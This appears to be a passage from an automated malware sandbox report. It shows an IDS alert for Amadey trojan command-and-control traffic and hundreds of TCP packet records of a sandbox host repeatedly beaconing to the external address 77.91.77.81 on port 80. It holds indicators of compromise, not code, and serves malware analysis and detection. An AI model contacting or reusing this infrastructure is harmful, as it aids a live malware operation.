                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                  07/02/24-00:25:04.486423TCP2856147ETPRO TROJAN Amadey CnC Activity M34973080192.168.2.477.91.77.81
                  TimestampSource PortDest PortSource IPDest IP
                  Jul 2, 2024 00:25:04.478326082 CEST4973080192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:04.485909939 CEST804973077.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:04.486056089 CEST4973080192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:04.486423016 CEST4973080192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:04.495362043 CEST804973077.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:05.210973024 CEST804973077.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:05.211033106 CEST4973080192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:05.212826014 CEST4973080192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:05.220443964 CEST804973077.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:05.442384958 CEST804973077.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:05.442471981 CEST4973080192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:05.553040028 CEST4973080192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:05.553416967 CEST4973180192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:05.560530901 CEST804973077.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:05.560549021 CEST804973177.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:05.560626984 CEST4973080192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:05.560668945 CEST4973180192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:05.560897112 CEST4973180192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:05.568037987 CEST804973177.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:06.259165049 CEST804973177.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:06.259229898 CEST4973180192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:06.260385990 CEST4973180192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:06.265388012 CEST804973177.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:06.476042986 CEST804973177.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:06.476109028 CEST4973180192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:06.605792999 CEST4973180192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:06.606093884 CEST4973280192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:06.612401962 CEST804973277.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:06.612484932 CEST4973280192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:06.612632990 CEST4973280192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:06.612782001 CEST804973177.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:06.612827063 CEST4973180192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:06.619695902 CEST804973277.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:07.334412098 CEST804973277.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:07.334485054 CEST4973280192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:07.381619930 CEST4973280192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:07.388427019 CEST804973277.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:07.608875036 CEST804973277.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:07.608957052 CEST4973280192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:07.794276953 CEST4973280192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:07.794723034 CEST4973380192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:07.801255941 CEST804973277.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:07.801316977 CEST4973280192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:07.801486969 CEST804973377.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:07.801548958 CEST4973380192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:07.801911116 CEST4973380192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:07.808712959 CEST804973377.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:08.560523033 CEST804973377.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:08.560722113 CEST4973380192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:08.561197042 CEST4973380192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:08.565912962 CEST804973377.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:08.791405916 CEST804973377.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:08.791620970 CEST4973380192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:08.896528959 CEST4973380192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:08.897243977 CEST4973480192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:08.901884079 CEST804973377.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:08.901947975 CEST4973380192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:08.902031898 CEST804973477.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:08.902107000 CEST4973480192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:08.902273893 CEST4973480192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:08.907582998 CEST804973477.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:09.594219923 CEST804973477.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:09.594293118 CEST4973480192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:09.595238924 CEST4973480192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:09.602046967 CEST804973477.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:09.815053940 CEST804973477.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:09.815150023 CEST4973480192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:09.928183079 CEST4973480192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:09.928487062 CEST4973580192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:09.937211990 CEST804973577.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:09.937231064 CEST804973477.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:09.937362909 CEST4973480192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:09.937377930 CEST4973580192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:09.937644958 CEST4973580192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:09.944834948 CEST804973577.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:10.671236992 CEST804973577.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:10.671392918 CEST4973580192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:10.696626902 CEST4973580192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:10.704195023 CEST804973577.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:10.930313110 CEST804973577.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:10.930416107 CEST4973580192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:11.255610943 CEST4973580192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:11.256154060 CEST4973680192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:11.263108015 CEST804973577.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:11.263211012 CEST4973580192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:11.263613939 CEST804973677.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:11.263705015 CEST4973680192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:11.266443014 CEST4973680192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:11.273260117 CEST804973677.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:11.985855103 CEST804973677.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:11.985919952 CEST4973680192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:11.986768961 CEST4973680192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:11.993875027 CEST804973677.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:12.205467939 CEST804973677.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:12.205602884 CEST4973680192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:12.318645000 CEST4973680192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:12.319020987 CEST4973780192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:12.326956034 CEST804973777.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:12.327111959 CEST4973780192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:12.327214003 CEST804973677.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:12.327308893 CEST4973680192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:12.327614069 CEST4973780192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:12.335551023 CEST804973777.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:13.035478115 CEST804973777.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:13.036628008 CEST4973780192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:13.036891937 CEST4973780192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:13.044605017 CEST804973777.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:13.263062000 CEST804973777.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:13.263149023 CEST4973780192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:13.384978056 CEST4973780192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:13.385315895 CEST4973880192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:13.392473936 CEST804973877.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:13.392618895 CEST4973880192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:13.392807007 CEST804973777.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:13.392848015 CEST4973880192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:13.392860889 CEST4973780192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:13.401071072 CEST804973877.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:14.127356052 CEST804973877.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:14.127568007 CEST4973880192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:14.171030045 CEST4973880192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:14.177700996 CEST804973877.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:14.389394999 CEST804973877.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:14.389467001 CEST4973880192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:14.674828053 CEST4973880192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:14.675188065 CEST4973980192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:14.682914019 CEST804973877.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:14.682976007 CEST4973880192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:14.683012009 CEST804973977.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:14.683073997 CEST4973980192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:14.686851025 CEST4973980192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:14.698437929 CEST804973977.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:15.407799959 CEST804973977.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:15.407907963 CEST4973980192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:15.446172953 CEST4973980192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:15.450995922 CEST804973977.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:15.672854900 CEST804973977.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:15.672914982 CEST4973980192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:15.788636923 CEST4973980192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:15.789048910 CEST4974180192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:15.793867111 CEST804973977.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:15.793931007 CEST4973980192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:15.794018030 CEST804974177.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:15.794112921 CEST4974180192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:15.794337034 CEST4974180192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:15.800287962 CEST804974177.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:16.525230885 CEST804974177.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:16.528665066 CEST4974180192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:16.534236908 CEST4974180192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:16.538944960 CEST804974177.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:16.753561020 CEST804974177.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:16.753942013 CEST4974180192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:16.865499020 CEST4974180192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:16.865994930 CEST4974380192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:16.870846033 CEST804974377.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:16.871138096 CEST804974177.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:16.871227980 CEST4974180192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:16.871228933 CEST4974380192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:16.871475935 CEST4974380192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:16.876211882 CEST804974377.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:17.585386038 CEST804974377.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:17.591197014 CEST4974380192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:17.799068928 CEST4974380192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:17.803946018 CEST804974377.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:18.025494099 CEST804974377.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:18.028301954 CEST4974380192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:18.784790039 CEST4974380192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:18.785456896 CEST4974680192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:18.791692019 CEST804974677.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:18.791768074 CEST4974680192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:18.795806885 CEST804974377.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:18.795898914 CEST4974380192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:18.796602011 CEST4974680192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:18.802803040 CEST804974677.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:19.490165949 CEST804974677.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:19.490245104 CEST4974680192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:19.490986109 CEST4974680192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:19.499445915 CEST804974677.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:19.712841034 CEST804974677.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:19.714318991 CEST4974680192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:19.818628073 CEST4974680192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:19.819077969 CEST4974880192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:19.825849056 CEST804974677.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:19.826364994 CEST804974877.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:19.826483011 CEST4974680192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:19.826553106 CEST4974880192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:19.826744080 CEST4974880192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:19.833894968 CEST804974877.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:20.539058924 CEST804974877.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:20.539316893 CEST4974880192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:20.540147066 CEST4974880192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:20.546890020 CEST804974877.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:20.758532047 CEST804974877.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:20.758601904 CEST4974880192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:20.865551949 CEST4974880192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:20.865941048 CEST4975080192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:20.873858929 CEST804975077.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:20.873986959 CEST4975080192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:20.874114990 CEST804974877.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:20.874166965 CEST4974880192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:20.874248028 CEST4975080192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:20.882021904 CEST804975077.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:21.580080032 CEST804975077.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:21.580157995 CEST4975080192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:21.588300943 CEST4975080192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:21.598802090 CEST804975077.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:21.811398029 CEST804975077.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:21.811520100 CEST4975080192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:22.540165901 CEST4975080192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:22.540663004 CEST4975180192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:22.549171925 CEST804975077.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:22.549225092 CEST4975080192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:22.549470901 CEST804975177.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:22.549530029 CEST4975180192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:22.551599026 CEST4975180192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:22.559786081 CEST804975177.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:23.267669916 CEST804975177.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:23.267748117 CEST4975180192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:23.268487930 CEST4975180192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:23.275578976 CEST804975177.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:23.494457960 CEST804975177.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:23.494538069 CEST4975180192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:23.602061987 CEST4975180192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:23.602416039 CEST4975280192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:23.609642982 CEST804975277.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:23.609740973 CEST4975280192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:23.609884024 CEST4975280192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:23.609894991 CEST804975177.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:23.609949112 CEST4975180192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:23.616658926 CEST804975277.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:24.315927982 CEST804975277.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:24.316015959 CEST4975280192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:24.316878080 CEST4975280192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:24.323961020 CEST804975277.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:24.543057919 CEST804975277.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:24.543152094 CEST4975280192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:24.647416115 CEST4975280192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:24.647805929 CEST4975380192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:24.655638933 CEST804975377.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:24.655786037 CEST4975380192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:24.655791998 CEST804975277.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:24.655864000 CEST4975280192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:24.655972004 CEST4975380192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:24.663268089 CEST804975377.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:25.364902020 CEST804975377.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:25.364983082 CEST4975380192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:25.366281986 CEST4975380192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:25.373282909 CEST804975377.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:25.589585066 CEST804975377.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:25.589775085 CEST4975380192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:25.693666935 CEST4975380192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:25.694087982 CEST4975480192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:25.700931072 CEST804975477.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:25.701185942 CEST4975480192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:25.701313019 CEST804975377.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:25.701375008 CEST4975380192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:25.701524973 CEST4975480192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:25.708971024 CEST804975477.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:26.465480089 CEST804975477.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:26.465636015 CEST4975480192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:26.466460943 CEST4975480192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:26.473716021 CEST804975477.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:26.694894075 CEST804975477.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:26.695022106 CEST4975480192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:26.803139925 CEST4975480192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:26.803680897 CEST4975580192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:26.810854912 CEST804975477.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:26.810870886 CEST804975577.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:26.810969114 CEST4975480192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:26.811012983 CEST4975580192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:26.811196089 CEST4975580192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:26.818135023 CEST804975577.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:27.521189928 CEST804975577.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:27.521270990 CEST4975580192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:27.651746988 CEST4975580192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:27.656523943 CEST804975577.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:27.879669905 CEST804975577.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:27.879854918 CEST4975580192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:28.116394043 CEST4975580192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:28.116898060 CEST4975680192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:28.121562004 CEST804975577.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:28.121629953 CEST4975580192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:28.121650934 CEST804975677.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:28.121727943 CEST4975680192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:28.129821062 CEST4975680192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:28.134608030 CEST804975677.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:28.828418016 CEST804975677.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:28.828562021 CEST4975680192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:28.829478979 CEST4975680192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:28.836308002 CEST804975677.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:29.053596020 CEST804975677.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:29.053828955 CEST4975680192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:29.162417889 CEST4975680192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:29.162792921 CEST4975780192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:29.167644024 CEST804975677.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:29.167660952 CEST804975777.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:29.167707920 CEST4975680192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:29.167772055 CEST4975780192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:29.167996883 CEST4975780192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:29.172720909 CEST804975777.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:29.863626003 CEST804975777.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:29.863753080 CEST4975780192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:29.864705086 CEST4975780192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:29.870584965 CEST804975777.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:30.086694956 CEST804975777.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:30.086857080 CEST4975780192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:30.193645000 CEST4975780192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:30.193969011 CEST4975880192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:30.198766947 CEST804975777.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:30.198872089 CEST4975780192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:30.198952913 CEST804975877.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:30.199032068 CEST4975880192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:30.199284077 CEST4975880192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:30.204106092 CEST804975877.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:30.903441906 CEST804975877.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:30.903582096 CEST4975880192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:30.922506094 CEST4975880192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:30.928925991 CEST804975877.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:31.143249989 CEST804975877.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:31.143332958 CEST4975880192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:31.487860918 CEST4975880192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:31.488218069 CEST4975980192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:31.492918015 CEST804975877.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:31.492985010 CEST4975880192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:31.493014097 CEST804975977.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:31.493081093 CEST4975980192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:31.565912962 CEST4975980192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:31.570822001 CEST804975977.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:32.219683886 CEST804975977.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:32.219769955 CEST4975980192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:32.220541000 CEST4975980192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:32.225331068 CEST804975977.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:32.436491013 CEST804975977.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:32.436568022 CEST4975980192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:32.555006981 CEST4975980192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:32.555309057 CEST4976080192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:32.560009003 CEST804975977.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:32.560082912 CEST4975980192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:32.560344934 CEST804976077.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:32.560415983 CEST4976080192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:32.560513020 CEST4976080192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:32.565291882 CEST804976077.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:33.276540995 CEST804976077.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:33.276657104 CEST4976080192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:33.277318954 CEST4976080192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:33.282049894 CEST804976077.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:33.508966923 CEST804976077.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:33.509308100 CEST4976080192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:33.615722895 CEST4976080192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:33.616086960 CEST4976180192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:33.620889902 CEST804976177.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:33.620944977 CEST804976077.91.77.81192.168.2.4
                  Jul 2, 2024 00:25:33.620965004 CEST4976180192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:33.621023893 CEST4976080192.168.2.477.91.77.81
                  Jul 2, 2024 00:25:33.621260881 CEST4976180192.168.2.477.91.77.81
